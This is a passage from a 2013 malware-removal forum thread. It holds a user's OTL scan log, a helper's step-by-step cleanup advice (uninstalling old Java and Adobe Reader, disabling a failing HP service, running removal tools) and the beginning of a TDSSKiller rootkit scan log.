[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\Updates from HP\137903\Program\BackWeb-137903.exe" = C:\Program Files\Updates from HP\137903\Program\BackWeb-137903.exe:*:Disabled:BackWeb-137903 -- ()
"C:\Program Files\LeapFTP\LeapFTP.exe" = C:\Program Files\LeapFTP\LeapFTP.exe:*:Enabled:File Transfer Protocol (FTP) Client -- (LeapWare)
"C:\WINDOWS\system32\dpvsetup.exe" = C:\WINDOWS\system32\dpvsetup.exe:*:Enabled:Microsoft DirectPlay Voice Test -- (Microsoft Corporation)
"C:\WINDOWS\system32\mmc.exe" = C:\WINDOWS\system32\mmc.exe:*:Enabled:Microsoft Management Console -- (Microsoft Corporation)
"C:\Program Files\activePDF\PrimoPDF\PrimoPDF.exe" = C:\Program Files\activePDF\PrimoPDF\PrimoPDF.exe:*:Enabled:PrimoPDF -- (activePDF)
"C:\Program Files\DNA\btdna.exe" = C:\Program Files\DNA\btdna.exe:*:Disabled:DNA -- (BitTorrent, Inc.)
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe" = C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Disabled:hposid01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqcopy.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqcopy.exe:*:Disabled:hpqcopy.exe -- ( )
"C:\Program Files\HP\Digital Imaging\Unload\HpqPhUnl.exe" = C:\Program Files\HP\Digital Imaging\Unload\HpqPhUnl.exe:*:Disabled:hpqphunl.exe -- ()
"C:\Program Files\IncrediMail\bin\ImApp.exe" = C:\Program Files\IncrediMail\bin\ImApp.exe:*:Disabled:IncrediMail -- (IncrediMail, Ltd.)


========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0289B35E-DC07-4c7a-9710-BBD686EA4B7D}" = Status
"{0609D0AF-1382-42BE-81DB-CF30F8B0F6E2}" = Serif PhotoPlus 6.0
"{07287123-B8AC-41CE-8346-3D777245C35B}" = Bonjour
"{0861E87B-24D7-4E7C-B11B-54F86E5C5199}" = hpg8200
"{14589F05-C658-4594-9429-D437BA688686}" = IntelliMover Data Transfer Demo
"{14B4E017-ACDF-4DB0-9D94-8988F5F0145A}" = hpg4600
"{15B9DC72-73F9-4d99-9E28-848D66DA8D99}" = HP Photo & Imaging 3.5 - HP Devices
"{18669FF9-C8FE-407a-9F70-E674896B1DB4}" = GPBaseService
"{1D643CD7-4DD6-11D7-A4E0-000874180BB3}" = Microsoft Money 2004
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F7CCFA3-D926-4882-B2A5-A0217ED25597}" = PC-Doctor for Windows
"{20CF99FC-2CE7-4AA4-966E-A4B11C0662B4}" = hpg3970
"{22DE1881-9D24-4981-B5CC-EC7E9F2F4D52}" = Rhapsody Player Engine
"{2614F54E-A828-49FA-93BA-45A3F756BFAA}" = 32 Bit HP CIO Components Installer
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}" = Java™ 6 Update 11
"{29B39FB2-5ADF-4F94-BC82-13942871DD0D}" = CameraDrivers
"{29B50D30-EAFC-4cea-9F76-3A0E3729E9B0}" = SkinsHP1
"{2E132061-C78A-48D4-A899-1D13B9D189FA}" = Memories Disc Creator 2.0
"{2FCE4FC5-6930-40E7-A4F1-F862207424EF}" = InterVideo WinDVD Creator 2
"{318AB667-3230-41B5-A617-CB3BF748D371}" = iTunes
"{3248F0A8-6813-11D6-A77B-00B0D0160030}" = Java™ 6 Update 3
"{3248F0A8-6813-11D6-A77B-00B0D0160050}" = Java™ 6 Update 5
"{3248F0A8-6813-11D6-A77B-00B0D0160070}" = Java™ 6 Update 7
"{34BFB099-07B2-4E95-A673-7362D60866A2}" = PSSWCORE
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3CF78481-FB7B-4B51-99A2-D5E0CD0B3AAF}" = HPSystemDiagnostics
"{45B6180B-DCAB-4093-8EE8-6164457517F0}" = Photosmart 140,240,7200,7600,7700,7900 Series
"{46C045BF-2B3F-4BC4-8E4C-00E0CF8BD9DB}" = Adobe AIR
"{48242276-DB89-42e8-9678-BD4280D7B99A}" = Copy
"{5109C064-813E-4e87-B0DE-C8AF7B5BC02B}" = SmartWebPrintingOC
"{54DE0B75-6CD9-44C4-B10A-1F25DA9899D8}" = Quicken 2004
"{5809E7CF-4DCF-11D4-9875-00105ACE7734}" = Logitech MouseWare 9.79
"{5D9B17E4-5C34-45B2-9C95-8B9DB4CF7AF3}" = HP_Network_UserGuide
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{60758250-C8CF-47EB-8CB6-E0C3B84D8207}" = PSShortcutsP
"{66E6CE0C-5A1E-430C-B40A-0C90FF1804A8}" = eSupportQFolder
"{679EC478-3FF9-4987-B2FF-C2C2B27532A2}" = DocProc
"{687FEF8A-8597-40b4-832C-297EA3F35817}" = BufferChm
"{6F5E2F4A-377D-4700-B0E3-8F7F7507EA15}" = CustomerResearchQFolder
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7148F0A8-6813-11D6-A77B-00B0D0142030}" = Java 2 Runtime Environment, SE v1.4.2_03
"{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK
"{745A92AF-53B4-41A7-91C3-9B026B1D5897}" = InstantShare
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{80533B67-C407-485D-8B5D-63BB8ED9D878}" = Scan
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{8777AC6D-89F9-4793-8266-DE406F343E89}" = QFolder
"{87E2B986-07E8-477a-93DC-AF0B6758B192}" = DocProcQFolder
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8A708DD8-A5E6-11D4-A706-000629E95E20}" = Intel® Graphics Media Accelerator Driver
"{8C64E145-54BA-11D6-91B1-00500462BE80}" = Microsoft Money 2004 System Pack
"{90120000-0020-0409-0000-0000000FF1CE}" = Compatibility Pack for the 2007 Office system
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{91120409-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Standard Edition 2003
"{924EB80F-C2BB-4B9F-8412-88BBA937393F}" = MobileMe Control Panel
"{98E8A2EF-4EAE-43B8-A172-74842B764777}" = InterVideo WinDVD Player
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9B03C535-3AEA-4ef2-B326-0A01A2207034}" = CreativeProjects
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9C2D4047-0E40-499a-AC7A-C4B9BB12FE03}" = TrayApp
"{A06275F4-324B-4E85-95E6-87B2CD729401}" = Windows Defender
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{A5AB9D5E-52E2-440e-A3ED-9512E253C81A}" = SolutionCenter
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AB5D51AE-EBC3-438D-872C-705C7C2084B0}" = DeviceManagementQFolder
"{AC76BA86-7AD7-1033-7B44-A81200000003}" = Adobe Reader 8.1.2
"{AC76BA86-7AD7-1033-7B44-A94000000001}" = Adobe Reader 9.4.1
"{AD17BC8E-4A5D-4E59-8640-10DF36E9EB75}" = hpg5530
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1" = Spybot - Search & Destroy
"{B8DBED1E-8BC3-4d08-B94A-F9D7D88E9BBF}" = HPSSupply
"{BAD0FA60-09CF-4411-AE6A-C2844C8812FA}" = HP Photosmart Essential 2.5
"{BC339BFD-F550-471a-8D26-4D08126C62F7}" = SkinsHP2
"{BCC899FE-2DAA-460C-A5FB-60291E73D9C3}" = Microsoft SQL Server Compact 3.5 ENU
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C6A7AF96-4EB1-4AAE-8318-1AB393C64F88}" = Microsoft Plus! Digital Media Edition
"{C6C44651-7C66-4b11-92E8-17565D3D22DD}" = HP Image Zone Plus 3.5
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CBE3E0AF-73BB-4c21-8B96-B09E003EDE7F}" = QuickProjects
"{CD10345B-0DD2-4C67-BC2C-F0CA6680AB21}" = Power BibleCD 4.0a
"{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}" = SUPERAntiSpyware
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D142FE39-3386-4d82-9AD3-36D4A92AC3C2}" = DocMgr
"{D2E0F0CC-6BE0-490b-B08B-9267083E34C9}" = MarketResearch
"{D99A8E3A-AE5A-4692-8B19-6F16D454E240}" = Destination Component
"{DB518BA6-CB74-4EB6-9ABD-880B6D6E1F38}" = HpSdpAppCoreApp
"{E08DC77E-D09A-4e36-8067-D6DBBCC5F8DC}" = VideoToolkit01
"{E8BFBD0A-8002-4dc9-869C-E495FA9DCE7A}" = PhotoGallery
"{EB3526D4-4C7C-4F45-8303-340A23E4F950}" = HPIZFix3
"{ED869D8B-6C7E-44C7-9F2F-BD5436849C61}" = hpg2436
"{EF1ADA5A-0B1A-4662-8C55-7475A61D8B65}" = DeviceDiscovery
"{F247869D-3643-4A9F-821B-3534145928E3}" = HPIZ350
"{F419D20A-7719-4639-8E30-C073A040D878}" = HP Deskjet Preloaded Printer Drivers
"{F50A4470-7A45-4A5A-97F8-806990B736C2}" = MP3+G Toolz
"{F958CA02-BB40-4007-894B-258729456EE4}" = QuickTime
"{FE57DE70-95DE-4B64-9266-84DA811053DB}" = HP Update
"{FF102450-55AA-4AE1-ACE4-E271E2470C83}" = hpmdtab
"62067F4C-84A9-45B9-8573-B90468B0A3EF" = Orbital from Hewlett-Packard Desktops (remove only)
"6723E59E-322A-417A-8E03-27A61E18253C" = Overball from Hewlett-Packard Desktops (remove only)
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Agere Systems Soft Modem" = Agere Systems PCI Soft Modem
"avast" = avast! Free Antivirus
"B8610D19-E576-4F91-8A2F-07898D9CA301" = Word Symphony from Hewlett-Packard Desktops (remove only)
"BackWeb-137903 Uninstaller" = Updates from HP
"BFBCBAE3-8293-4215-9C4F-C2402C118EDB" = Otto from Hewlett-Packard Desktops (remove only)
"C2C3C2DB-7D8A-4E20-B527-E3149FAECC3A" = Slyder from Hewlett-Packard Desktops (remove only)
"CCleaner" = CCleaner
"DivX Setup" = DivX Setup
"ERUNT_is1" = ERUNT 1.1j
"Eusing Free Registry Cleaner" = Eusing Free Registry Cleaner
"F5215F01-DFC0-475D-A910-6F1AF94E807E" = Tradewinds from Hewlett-Packard Desktops (remove only)
"getPlus®_ocx" = getPlus®_ocx
"Google Chrome" = Google Chrome
"HP Document Manager" = HP Document Manager 1.0
"HP Imaging Device Functions" = HP Imaging Device Functions 10.0
"HP Instant Support" = HP Instant Support
"HP Photo & Imaging" = HP Image Zone 4.2
"HP Photosmart Essential" = HP Photosmart Essential 2.5
"HP Smart Web Printing" = HP Smart Web Printing
"HP Solution Center & Imaging Support Tools" = HP Solution Center 10.0
"HPExtendedCapabilities" = HP Customer Participation Program 10.0
"HPOCR" = OCR Software by I.R.I.S. 10.0
"HPTOOLKIT" = Toolkit View(HP)
"IDNMitigationAPIs" = Microsoft Internationalized Domain Names Mitigation APIs
"ie7" = Windows Internet Explorer 7
"ie8" = Windows Internet Explorer 8
"InstallShield_{54DE0B75-6CD9-44C4-B10A-1F25DA9899D8}" = Quicken 2004
"KaraFun_is1" = KaraFun 1.17a
"LeapFTP" = LeapFTP
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.70.0.1100
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Mozilla Firefox 18.0 (x86 en-US)" = Mozilla Firefox 18.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MSCompPackV1" = Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping" = Microsoft National Language Support Downlevel APIs
"Photo To Sketch_is1" = Photo To Sketch 3.51
"Premiumplay Codec-C" = Premiumplay Codec-C
"PrimoPDF" = PrimoPDF -- brought to you by Nitro PDF Software
"PrimoPDF4.0.1" = PrimoPDF
"PS2" = PS2
"Python 2.2 combined Win32 extensions" = Python 2.2 combined Win32 extensions
"Python 2.2.1" = Python 2.2.1
"Shop for HP Supplies" = Shop for HP Supplies
"WIC" = Windows Imaging Component
"Windows Live OneCare safety scanner" = Windows Live OneCare safety scanner
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows Media Player" = Windows Media Player 11
"Windows XP Service Pack" = Windows XP Service Pack 3
"Windstream_BCUC" = Windstream Broadband Check-up Center
"WMFDist11" = Windows Media Format 11 runtime
"wmp11" = Windows Media Player 11
"Wudf01000" = Microsoft User-Mode Driver Framework Feature Pack 1.0
"XpsEPSC" = XML Paper Specification Shared Components Pack 1.0

========== HKEY_CURRENT_USER Uninstall List ==========

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"BitTorrent DNA" = DNA
"e44d5ab8e5bc2330" = Karaoke File Converter

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 1/19/2013 12:30:33 AM | Computer Name = YOUR-46E94OWX6A | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 18.0.0.4752, hang module
hungapp, version 0.0.0.0, hang address 0x00000000.

Error - 1/19/2013 12:30:37 AM | Computer Name = YOUR-46E94OWX6A | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 18.0.0.4752, hang module
hungapp, version 0.0.0.0, hang address 0x00000000.

Error - 1/19/2013 12:30:39 AM | Computer Name = YOUR-46E94OWX6A | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 18.0.0.4752, hang module
hungapp, version 0.0.0.0, hang address 0x00000000.

[ System Events ]
Error - 1/19/2013 12:22:43 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7000
Description = The SAS Core Service service failed to start due to the following
error: %%3

Error - 1/19/2013 12:22:43 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7000
Description = The AVG Free WatchDog service failed to start due to the following
error: %%3

Error - 1/19/2013 12:22:43 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7000
Description = The mrtRate service failed to start due to the following error: %%2

Error - 1/19/2013 12:22:43 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7001
Description = The AVG Free E-mail Scanner service depends on the AVG Free WatchDog
service which failed to start because of the following error: %%3

Error - 1/19/2013 12:24:07 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7022
Description = The HP CUE DeviceDiscovery Service service hung on starting.

Error - 1/19/2013 12:24:11 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7023
Description = The HP CUE DeviceDiscovery Service service terminated with the following
error: %%2147500037


< End of report >

#12
RKinner

    Malware Expert

  • Expert
  • 24,624 posts
  • MVP
Did you see my post about running TDSSkiller again?

Uninstall:

Java™ 6 Update 11 - Current version but all versions of Java are dangerous and vulnerable to hackers. We recommend Java be removed.
Java™ 6 Update 3 - Old versions are worse and must be removed.
Java™ 6 Update 5
Java™ 6 Update 7
Java 2 Runtime Environment, SE v1.4.2_03
Adobe Reader 8.1.2 - Old versions of Reader are dangerous. Remove and then get the latest Reader from adobe.com. Uncheck any additional software they offer you during the download. You don't want the Ask or Yahoo toolbars or the McAfee Security Scan.
Adobe Reader 9.4.1
Eusing Free Registry Cleaner - Never use registry cleaners. They can destroy your system.
getPlus®_ocx - Unneeded download program installed by adobe.com
DNA - P2P programs are dangerous.
SUPERAntiSpyware - Broken

Following is for the HP CUE Device Discovery Service errors:

1. Click on the start menu and click on 'Run', and then type 'services.msc' and press the Enter button.
2. In the Services window, look for HP CUE Device Discovery Service, and double click on it.
3. You should see a button labelled 'STOP'. Click on that button.
4. Above this, you should find something which says 'Startup Type'. Change that to 'Disabled'.
5. Click on the 'Apply' button and close all windows.


Following is for the AVG errors:

Download and save the AVG removal tool
http://download.avg....6_2011_1184.exe
Run the tool.


Download the adwCleaner

  • Run the Tool
    Windows Vista and Windows 7 users:
    Right-click on adwCleaner.exe and select the option
    Posted Image
  • Select the Delete button.
  • When the scan completes, it will open a Notepad window.
  • Please copy the content of this file into your next reply.

Open IE, then click on the gear, then click the Safety button, point to SmartScreen Filter, and then click Turn Off SmartScreen Filter. In the Microsoft SmartScreen Filter dialog box, click OK.

Run OTL again and do a Quickscan and post the log.

How is it running now?

#13
goodseed

    Member

  • Topic Starter
  • Member
  • PipPip
  • 49 posts
08:08:10.0859 2044 TDSS rootkit removing tool 2.8.15.0 Oct 31 2012 21:47:35
08:08:11.0343 2044 ============================================================
08:08:11.0343 2044 Current date / time: 2013/01/19 08:08:11.0343
08:08:11.0343 2044 SystemInfo:
08:08:11.0343 2044
08:08:11.0343 2044 OS Version: 5.1.2600 ServicePack: 3.0
08:08:11.0343 2044 Product type: Workstation
08:08:11.0343 2044 ComputerName: YOUR-46E94OWX6A
08:08:11.0343 2044 UserName: Owner
08:08:11.0343 2044 Windows directory: C:\WINDOWS
08:08:11.0343 2044 System windows directory: C:\WINDOWS
08:08:11.0343 2044 Processor architecture: Intel x86
08:08:11.0343 2044 Number of processors: 2
08:08:11.0343 2044 Page size: 0x1000
08:08:11.0343 2044 Boot type: Normal boot
08:08:11.0343 2044 ============================================================
08:08:12.0390 2044 Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 (149.05 Gb), SectorSize: 0x200, Cylinders: 0x50C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xF0, Type 'K0', Flags 0x00000054
08:08:12.0625 2044 ============================================================
08:08:12.0625 2044 \Device\Harddisk0\DR0:
08:08:12.0625 2044 MBR partitions:
08:08:12.0625 2044 \Device\Harddisk0\DR0\Partition1: MBR, Type 0xB, StartLBA 0x3F, BlocksNum 0x9B7FE1
08:08:12.0625 2044 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x9B8020, BlocksNum 0x1205CBE0
08:08:12.0625 2044 ============================================================
08:08:12.0671 2044 C: <-> \Device\Harddisk0\DR0\Partition2
08:08:12.0671 2044 D: <-> \Device\Harddisk0\DR0\Partition1
08:08:12.0671 2044 ============================================================
08:08:12.0671 2044 Initialize success
08:08:12.0671 2044 ============================================================
08:08:16.0359 0224 ============================================================
08:08:16.0359 0224 Scan started
08:08:16.0359 0224 Mode: Manual;
08:08:16.0359 0224 ============================================================
08:08:17.0421 0224 ================ Scan system memory ========================
08:08:17.0421 0224 System memory - ok
08:08:17.0421 0224 ================ Scan services =============================
08:08:17.0453 0224 Aavmker4 - ok
08:08:17.0468 0224 Abiosdsk - ok
08:08:17.0484 0224 abp480n5 - ok
08:08:17.0500 0224 ACPI - ok
08:08:17.0500 0224 ACPIEC - ok
08:08:17.0515 0224 adpu160m - ok
08:08:17.0531 0224 aec - ok
08:08:17.0546 0224 AFD - ok
08:08:17.0562 0224 AFS2K - ok
08:08:17.0562 0224 AgereSoftModem - ok
08:08:17.0578 0224 Aha154x - ok
08:08:17.0593 0224 aic78u2 - ok
08:08:17.0609 0224 aic78xx - ok
08:08:17.0609 0224 Alerter - ok
08:08:17.0625 0224 ALG - ok
08:08:17.0640 0224 AliIde - ok
08:08:17.0656 0224 AmdK7 - ok
08:08:17.0671 0224 amsint - ok
08:08:17.0687 0224 AppMgmt - ok
08:08:17.0687 0224 Arp1394 - ok
08:08:17.0703 0224 asc - ok
08:08:17.0718 0224 asc3350p - ok
08:08:17.0734 0224 asc3550 - ok
08:08:17.0781 0224 aspnet_state - ok
08:08:17.0796 0224 aswFsBlk - ok
08:08:17.0796 0224 aswMon2 - ok
08:08:17.0812 0224 AswRdr - ok
08:08:17.0828 0224 aswSnx - ok
08:08:17.0843 0224 aswSP - ok
08:08:17.0859 0224 aswTdi - ok
08:08:17.0859 0224 AsyncMac - ok
08:08:17.0875 0224 atapi - ok
08:08:17.0890 0224 Atdisk - ok
08:08:17.0906 0224 Atmarpc - ok
08:08:17.0921 0224 AudioSrv - ok
08:08:17.0921 0224 audstub - ok
08:08:17.0937 0224 avast! Antivirus - ok
08:08:17.0984 0224 Beep - ok
08:08:17.0984 0224 BITS - ok
08:08:18.0000 0224 Bonjour Service - ok
08:08:18.0015 0224 Browser - ok
08:08:18.0031 0224 BVRPMPR5 - ok
08:08:18.0046 0224 catchme - ok
08:08:18.0046 0224 cbidf2k - ok
08:08:18.0062 0224 cd20xrnt - ok
08:08:18.0078 0224 Cdaudio - ok
08:08:18.0093 0224 Cdfs - ok
08:08:18.0109 0224 Cdrom - ok
08:08:18.0109 0224 Changer - ok
08:08:18.0125 0224 CiSvc - ok
08:08:18.0140 0224 ClipSrv - ok
08:08:18.0156 0224 clr_optimization_v2.0.50727_32 - ok
08:08:18.0171 0224 CmdIde - ok
08:08:18.0187 0224 COMSysApp - ok
08:08:18.0218 0224 Cpqarray - ok
08:08:18.0234 0224 CryptSvc - ok
08:08:18.0234 0224 dac2w2k - ok
08:08:18.0250 0224 dac960nt - ok
08:08:18.0265 0224 DcomLaunch - ok
08:08:18.0281 0224 Dhcp - ok
08:08:18.0296 0224 Disk - ok
08:08:18.0312 0224 dmadmin - ok
08:08:18.0312 0224 dmboot - ok
08:08:18.0328 0224 dmio - ok
08:08:18.0343 0224 dmload - ok
08:08:18.0359 0224 dmserver - ok
08:08:18.0359 0224 DMusic - ok
08:08:18.0375 0224 Dnscache - ok
08:08:18.0390 0224 Dot3svc - ok
08:08:18.0406 0224 dpti2o - ok
08:08:18.0421 0224 drmkaud - ok
08:08:18.0437 0224 EapHost - ok
08:08:18.0437 0224 ERSvc - ok
08:08:18.0453 0224 eusk2par - ok
08:08:18.0468 0224 Eventlog - ok
08:08:18.0484 0224 EventSystem - ok
08:08:18.0500 0224 Fastfat - ok
08:08:18.0500 0224 fasttx2k - ok
08:08:18.0515 0224 FastUserSwitchingCompatibility - ok
08:08:18.0531 0224 Fax - ok
08:08:18.0546 0224 Fdc - ok
08:08:18.0562 0224 Fips - ok
08:08:18.0578 0224 Flpydisk - ok
08:08:18.0578 0224 FltMgr - ok
08:08:18.0593 0224 FontCache3.0.0.0 - ok
08:08:18.0609 0224 Fs_Rec - ok
08:08:18.0625 0224 Ftdisk - ok
08:08:18.0640 0224 GEARAspiWDM - ok
08:08:18.0640 0224 Gpc - ok
08:08:18.0656 0224 gupdate - ok
08:08:18.0671 0224 gupdatem - ok
08:08:18.0687 0224 HDAudBus - ok
08:08:18.0703 0224 helpsvc - ok
08:08:18.0718 0224 HidServ - ok
08:08:18.0734 0224 HidUsb - ok
08:08:18.0734 0224 hkmsvc - ok
08:08:18.0750 0224 hpn - ok
08:08:18.0765 0224 hpqcxs08 - ok
08:08:18.0781 0224 hpqddsvc - ok
08:08:18.0796 0224 HPZid412 - ok
08:08:18.0812 0224 HPZipr12 - ok
08:08:18.0828 0224 HPZius12 - ok
08:08:18.0828 0224 HTTP - ok
08:08:18.0843 0224 HTTPFilter - ok
08:08:18.0859 0224 i2omgmt - ok
08:08:18.0875 0224 i2omp - ok
08:08:18.0890 0224 i8042prt - ok
08:08:18.0906 0224 ialm - ok
08:08:18.0921 0224 idsvc - ok
08:08:18.0921 0224 Imapi - ok
08:08:18.0937 0224 ImapiService - ok
08:08:18.0953 0224 ini910u - ok
08:08:18.0984 0224 IntcAzAudAddService - ok
08:08:18.0984 0224 IntelIde - ok
08:08:19.0000 0224 intelppm - ok
08:08:19.0015 0224 ip6fw - ok
08:08:19.0031 0224 IpFilterDriver - ok
08:08:19.0046 0224 IpInIp - ok
08:08:19.0062 0224 IpNat - ok
08:08:19.0062 0224 iPod Service - ok
08:08:19.0078 0224 IPSec - ok
08:08:19.0093 0224 IRENUM - ok
08:08:19.0109 0224 isapnp - ok
08:08:19.0125 0224 Iviaspi - ok
08:08:19.0140 0224 JavaQuickStarterService - ok
08:08:19.0156 0224 Kbdclass - ok
08:08:19.0171 0224 kmixer - ok
08:08:19.0187 0224 KSecDD - ok
08:08:19.0187 0224 L8042pr2 - ok
08:08:19.0218 0224 lanmanserver - ok
08:08:19.0218 0224 lanmanworkstation - ok
08:08:19.0234 0224 lbrtfdc - ok
08:08:19.0250 0224 LmHosts - ok
08:08:19.0265 0224 LMouFlt2 - ok
08:08:19.0281 0224 McciCMService - ok
08:08:19.0296 0224 Messenger - ok
08:08:19.0312 0224 mnmdd - ok
08:08:19.0312 0224 mnmsrvc - ok
08:08:19.0328 0224 Modem - ok
08:08:19.0343 0224 Mouclass - ok
08:08:19.0359 0224 mouhid - ok
08:08:19.0375 0224 MountMgr - ok
08:08:19.0375 0224 MozillaMaintenance - ok
08:08:19.0390 0224 MpKsl08115bda - ok
08:08:19.0406 0224 mraid35x - ok
08:08:19.0421 0224 MREMP50 - ok
08:08:19.0437 0224 MREMPR5 - ok
08:08:19.0453 0224 MRENDIS5 - ok
08:08:19.0468 0224 MRESP50 - ok
08:08:19.0484 0224 mrtRate - ok
08:08:19.0484 0224 MRxDAV - ok
08:08:19.0500 0224 MRxSmb - ok
08:08:19.0515 0224 MSDTC - ok
08:08:19.0531 0224 Msfs - ok
08:08:19.0546 0224 MSIServer - ok
08:08:19.0562 0224 MSKSSRV - ok
08:08:19.0578 0224 MSPCLOCK - ok
08:08:19.0593 0224 MSPQM - ok
08:08:19.0593 0224 mssmbios - ok
08:08:19.0609 0224 Mup - ok
08:08:19.0625 0224 napagent - ok
08:08:19.0640 0224 NDIS - ok
08:08:19.0640 0224 NdisTapi - ok
08:08:19.0656 0224 Ndisuio - ok
08:08:19.0671 0224 NdisWan - ok
08:08:19.0671 0224 NDProxy - ok
08:08:19.0687 0224 Net Driver HPZ12 - ok
08:08:19.0703 0224 NetBIOS - ok
08:08:19.0703 0224 NetBT - ok
08:08:19.0718 0224 NetDDE - ok
08:08:19.0718 0224 NetDDEdsdm - ok
08:08:19.0734 0224 Netlogon - ok
08:08:19.0734 0224 Netman - ok
08:08:19.0750 0224 NetTcpPortSharing - ok
08:08:19.0750 0224 NIC1394 - ok
08:08:19.0765 0224 Nla - ok
08:08:19.0781 0224 Npfs - ok
08:08:19.0781 0224 Ntfs - ok
08:08:19.0796 0224 NtLmSsp - ok
08:08:19.0796 0224 NtmsSvc - ok
08:08:19.0812 0224 Null - ok
08:08:19.0828 0224 NwlnkFlt - ok
08:08:19.0828 0224 NwlnkFwd - ok
08:08:19.0843 0224 ohci1394 - ok
08:08:19.0843 0224 ose - ok
08:08:19.0859 0224 Parport - ok
08:08:19.0875 0224 PartMgr - ok
08:08:19.0875 0224 ParVdm - ok
08:08:19.0890 0224 PCI - ok
08:08:19.0890 0224 PCIDump - ok
08:08:19.0906 0224 PCIIde - ok
08:08:19.0906 0224 Pcmcia - ok
08:08:19.0921 0224 PDCOMP - ok
08:08:19.0921 0224 PDFRAME - ok
08:08:19.0937 0224 PDRELI - ok
08:08:19.0953 0224 PDRFRAME - ok
08:08:19.0953 0224 perc2 - ok
08:08:19.0968 0224 perc2hib - ok
08:08:19.0984 0224 Pfc - ok
08:08:20.0000 0224 PlugPlay - ok
08:08:20.0015 0224 Pml Driver HPZ12 - ok
08:08:20.0015 0224 PolicyAgent - ok
08:08:20.0031 0224 PptpMiniport - ok
08:08:20.0046 0224 Processor - ok
08:08:20.0046 0224 ProtectedStorage - ok
08:08:20.0062 0224 Ps2 - ok
08:08:20.0062 0224 PSched - ok
08:08:20.0078 0224 Ptilink - ok
08:08:20.0093 0224 PxHelp20 - ok
08:08:20.0093 0224 ql1080 - ok
08:08:20.0109 0224 Ql10wnt - ok
08:08:20.0109 0224 ql12160 - ok
08:08:20.0125 0224 ql1240 - ok
08:08:20.0125 0224 ql1280 - ok
08:08:20.0140 0224 RasAcd - ok
08:08:20.0156 0224 RasAuto - ok
08:08:20.0156 0224 Rasl2tp - ok
08:08:20.0171 0224 RasMan - ok
08:08:20.0171 0224 RasPppoe - ok
08:08:20.0187 0224 Raspti - ok
08:08:20.0187 0224 Rdbss - ok
08:08:20.0203 0224 RDPCDD - ok
08:08:20.0218 0224 RDPWD - ok
08:08:20.0234 0224 RDSessMgr - ok
08:08:20.0234 0224 redbook - ok
08:08:20.0250 0224 RemoteAccess - ok
08:08:20.0250 0224 RpcLocator - ok
08:08:20.0265 0224 RpcSs - ok
08:08:20.0281 0224 RSVP - ok
08:08:20.0281 0224 rtl8139 - ok
08:08:20.0296 0224 SamSs - ok
08:08:20.0296 0224 SASDIFSV - ok
08:08:20.0312 0224 SASKUTIL - ok
08:08:20.0312 0224 SCardSvr - ok
08:08:20.0328 0224 Schedule - ok
